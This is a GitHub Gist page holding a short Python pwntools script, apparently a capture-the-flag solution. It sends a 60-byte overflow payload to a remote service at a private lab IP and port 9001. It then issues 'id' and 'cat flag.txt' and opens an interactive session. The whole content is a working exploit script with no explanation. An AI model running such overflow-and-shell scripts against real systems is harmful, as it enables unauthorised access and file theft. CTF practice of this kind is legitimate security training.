Created
May 2, 2022 20:02
-
-
Save 7h3h4ckv157/c7d5810784112adb2e6329eb6d6c0c93 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
payload = b"A"*60 | |
connect = remote('10.10.27.163', '9001') | |
connect.sendline(payload) | |
connect.sendline('id') | |
connect.sendline('cat flag.txt') | |
connect.interactive() | |
connect.recv() | |
connect.close() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment